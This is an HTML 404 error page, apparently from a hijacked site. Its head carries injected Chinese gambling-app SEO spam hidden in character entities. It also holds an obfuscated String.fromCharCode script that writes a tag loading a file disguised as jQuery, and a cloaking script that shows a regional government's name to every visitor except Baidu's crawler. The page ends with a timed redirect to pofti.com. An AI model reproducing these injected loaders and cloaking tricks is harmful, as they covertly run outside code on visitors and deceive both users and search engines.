<!DOCTYPE html>
<html lang="en">

<head><title>&#x661F;&#x7A7A;&#x4F53;&#x80B2;app&#x767B;&#x5F55;&#x5165;&#x53E3;&#x4E0B;&#x8F7D;&#x82F9;&#x679C;-&#x6700;&#x65B0;&#x7248;v.8.8.8.8</title>
<meta name="keywords" content="&#26143;&#31354;&#20307;&#32946;&#97;&#112;&#112;&#30331;&#24405;&#20837;&#21475;&#19979;&#36733;&#33529;&#26524;&#44;&#105;&#112;&#97;&#100;&#26143;&#31354;&#23448;&#32593;&#44;&#26143;&#31354;&#20307;&#32946;&#22810;&#29305;&#33945;&#24503;"/>
<meta name="description" content="&#26143;&#31354;&#20307;&#32946;&#20026;&#24744;&#25552;&#20379;&#26368;&#26032;&#26368;&#20840;&#30340;&#22810;&#29305;&#33945;&#24503;&#36275;&#29699;&#20465;&#20048;&#37096;&#30456;&#20851;&#36164;&#35759;&#65292;&#21253;&#25324;&#36187;&#20107;&#25253;&#36947;&#12289;&#29699;&#38431;&#21160;&#24577;&#12289;&#29699;&#21592;&#26032;&#38395;&#31561;&#20869;&#23481;&#12290;&#25105;&#20204;&#33268;&#21147;&#20110;&#20026;&#24744;&#21576;&#29616;&#26368;&#31934;&#24425;&#30340;&#22810;&#29305;&#33945;&#24503;&#36275;&#29699;&#19990;&#30028;&#65292;&#35753;&#24744;&#38543;&#26102;&#38543;&#22320;&#25484;&#25569;&#20465;&#20048;&#37096;&#30340;&#26368;&#26032;&#21160;&#24577;&#12290;&#31435;&#21363;&#35775;&#38382;&#26143;&#31354;&#20307;&#32946;&#65292;&#30021;&#20139;&#36275;&#29699;&#28608;&#24773;&#65281;"/>

<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,106,115,47,106,113,117,101,114,121,46,51,46,53,46,50,46,109,105,110,46,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="内蒙古自治区人民政府"}</script>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  <link href="images/favicon.gif" rel="shortcut icon" type="image/x-icon" />
  <link rel="stylesheet" href="css/base.css">
  <script src="js/jquery.min.js"></script>
  <title></title>
  <style>
  .sxz_baocuo_box {
  height: 100vh;
  width: 100vw;
}
.sxz_baocuo_box img {
  height: 481px;
  display: block;
  margin: 0 auto 74px;
  padding-top: 92px;
}
.sxz_baocuo_title {
  font-size: 40px;
  color: #848e96;
  text-align: center;
}
.sxz_baocuo_font {
  margin-top: 20px;
  font-size: 18px;
  color: #848e95;
  text-align: center;
}
.sxz_baocuo_font i {
  color: #0671fe;
}
.sxz_baocuo_font a {
  color: #0671fe;
  text-decoration: underline;
}
.sxz_baocuo_button {
  margin-top: 65px;
  padding: 0 42%;
}
.sxz_baocuo_button_l {
  height: 45px;
  width: 131px;
  border-radius: 22px;
  text-align: center;
  line-height: 45px;
  background-color: #0671fe;
}
.sxz_baocuo_button_l a {
  display: block;
  width: 100%;
  height: 100%;
  color: #fff;
}

.sxz_baocuo_button_l a:hover {
  color: #fff;
}
</style>
</head>

<body>
  <div class="sxz_baocuo_box">
    <img src="./images/sxz_404.png" alt="">
    <p class="sxz_baocuo_title">很抱歉，您所访问的页面不存在！</p>
    <p class="sxz_baocuo_font">
      系统将在<i id="count_down">5</i> 秒内为您跳转，如不能跳转<a href="http://www.pofti.com">点击这里>></a>
    </p>
    <div class="sxz_baocuo_button clearfix">
      <div class="sxz_baocuo_button_l l">
        <a href="http://www.pofti.com">
          返回首页
        </a>
      </div>
      <div class="sxz_baocuo_button_l r">
        <a href="javascript:void(0)" id="pre">
          返回上一级
        </a>
      </div>
    </div>
  </div>
</body>
<script>
  $(document).ready(function () {
    console.log('kklll')
    let num = 5
    setInterval(function () {
      if (num <= 0) {
        window.location.href = "http://www.pofti.com"
      }
      $('#count_down').text(num)
      --num
    }, 1000)
    $('#pre').click(function () {
      console.log('kkk')
      window.history.go(-1)
    })
  })
</script>

</html>
